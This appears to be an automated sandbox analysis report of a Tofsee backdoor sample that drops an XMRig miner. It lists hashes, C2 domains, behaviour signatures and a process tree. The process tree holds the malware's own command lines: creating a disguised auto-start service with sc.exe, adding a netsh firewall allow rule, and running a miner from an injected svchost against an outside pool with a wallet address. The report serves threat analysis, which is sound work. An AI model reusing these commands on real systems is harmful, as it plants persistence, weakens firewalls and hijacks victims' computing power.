Analysis

  • max time kernel
    163s
  • max time network
    186s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-06-2022 11:17

General

  • Target

    21ce422164fd4587da58e19dae615ad3ccd8bb895e8c7bd4354b4262de3d8167.exe

  • Size

    215KB

  • MD5

    9d80f82158b4355f87ca968a54492ad5

  • SHA1

    f7348be7badc8eaac931c3ee697ef8bb558d554e

  • SHA256

    21ce422164fd4587da58e19dae615ad3ccd8bb895e8c7bd4354b4262de3d8167

  • SHA512

    2a1156d21c6ac8e551e407a861b8a1b40427246860867d6b6a64f8d68c1b93f8f870758749a1879a42019166c5d50d50120d7e4a0a7bc96f35eef23580ccd605

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\21ce422164fd4587da58e19dae615ad3ccd8bb895e8c7bd4354b4262de3d8167.exe
    "C:\Users\Admin\AppData\Local\Temp\21ce422164fd4587da58e19dae615ad3ccd8bb895e8c7bd4354b4262de3d8167.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vsbehmni\
      2⤵
        PID:1760
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rgquhix.exe" C:\Windows\SysWOW64\vsbehmni\
        2⤵
          PID:4576
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create vsbehmni binPath= "C:\Windows\SysWOW64\vsbehmni\rgquhix.exe /d\"C:\Users\Admin\AppData\Local\Temp\21ce422164fd4587da58e19dae615ad3ccd8bb895e8c7bd4354b4262de3d8167.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:448
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description vsbehmni "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:676
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start vsbehmni
          2⤵
          • Launches sc.exe
          PID:3872
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3440
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1196
          2⤵
          • Program crash
          PID:1524
      • C:\Windows\SysWOW64\vsbehmni\rgquhix.exe
        C:\Windows\SysWOW64\vsbehmni\rgquhix.exe /d"C:\Users\Admin\AppData\Local\Temp\21ce422164fd4587da58e19dae615ad3ccd8bb895e8c7bd4354b4262de3d8167.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:936
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1880
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 544
          2⤵
          • Program crash
          PID:2760
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3448 -ip 3448
        1⤵
          PID:1452
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4804 -ip 4804
          1⤵
            PID:1080

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\rgquhix.exe
            Filesize

            14.1MB

            MD5

            61c84187845476e48c311f1a80e810cb

            SHA1

            ba79332e02da849151f5b0fb8a651f675ed1c665

            SHA256

            195e926cff1f1e3fc53cb4aea9d72a540578c1736ac718a1f96bfb4e37945eed

            SHA512

            196da8e03d77c8a6e7f77d1d3ab6623d9e1fb24bcd57996fea7ad5553c810b17b208701e6844170407adf47e8754e0691390532b191b5cebc9bb53abc8aadaa1

          • C:\Windows\SysWOW64\vsbehmni\rgquhix.exe
            Filesize

            14.1MB

            MD5

            61c84187845476e48c311f1a80e810cb

            SHA1

            ba79332e02da849151f5b0fb8a651f675ed1c665

            SHA256

            195e926cff1f1e3fc53cb4aea9d72a540578c1736ac718a1f96bfb4e37945eed

            SHA512

            196da8e03d77c8a6e7f77d1d3ab6623d9e1fb24bcd57996fea7ad5553c810b17b208701e6844170407adf47e8754e0691390532b191b5cebc9bb53abc8aadaa1

          • memory/448-136-0x0000000000000000-mapping.dmp
          • memory/676-137-0x0000000000000000-mapping.dmp
          • memory/936-155-0x0000000001DD0000-0x0000000001DD6000-memory.dmp
            Filesize

            24KB

          • memory/936-161-0x0000000001DF0000-0x0000000001DF5000-memory.dmp
            Filesize

            20KB

          • memory/936-167-0x0000000002DD0000-0x0000000002DD7000-memory.dmp
            Filesize

            28KB

          • memory/936-164-0x0000000007780000-0x0000000007B8B000-memory.dmp
            Filesize

            4.0MB

          • memory/936-158-0x0000000001DE0000-0x0000000001DF0000-memory.dmp
            Filesize

            64KB

          • memory/936-152-0x0000000002800000-0x0000000002A0F000-memory.dmp
            Filesize

            2.1MB

          • memory/936-151-0x0000000000760000-0x0000000000775000-memory.dmp
            Filesize

            84KB

          • memory/936-149-0x0000000000760000-0x0000000000775000-memory.dmp
            Filesize

            84KB

          • memory/936-146-0x0000000000760000-0x0000000000775000-memory.dmp
            Filesize

            84KB

          • memory/936-145-0x0000000000000000-mapping.dmp
          • memory/1760-133-0x0000000000000000-mapping.dmp
          • memory/1880-176-0x0000000000E00000-0x0000000000EF1000-memory.dmp
            Filesize

            964KB

          • memory/1880-171-0x0000000000E00000-0x0000000000EF1000-memory.dmp
            Filesize

            964KB

          • memory/1880-170-0x0000000000000000-mapping.dmp
          • memory/3440-140-0x0000000000000000-mapping.dmp
          • memory/3448-143-0x00000000008FF000-0x000000000090D000-memory.dmp
            Filesize

            56KB

          • memory/3448-131-0x0000000002390000-0x00000000023A3000-memory.dmp
            Filesize

            76KB

          • memory/3448-130-0x00000000008FF000-0x000000000090D000-memory.dmp
            Filesize

            56KB

          • memory/3448-144-0x0000000000400000-0x0000000000651000-memory.dmp
            Filesize

            2.3MB

          • memory/3448-132-0x0000000000400000-0x0000000000651000-memory.dmp
            Filesize

            2.3MB

          • memory/3872-138-0x0000000000000000-mapping.dmp
          • memory/4576-134-0x0000000000000000-mapping.dmp
          • memory/4804-150-0x0000000000400000-0x0000000000651000-memory.dmp
            Filesize

            2.3MB

          • memory/4804-141-0x00000000006E9000-0x00000000006F7000-memory.dmp
            Filesize

            56KB

          • memory/4804-142-0x0000000000400000-0x0000000000651000-memory.dmp
            Filesize

            2.3MB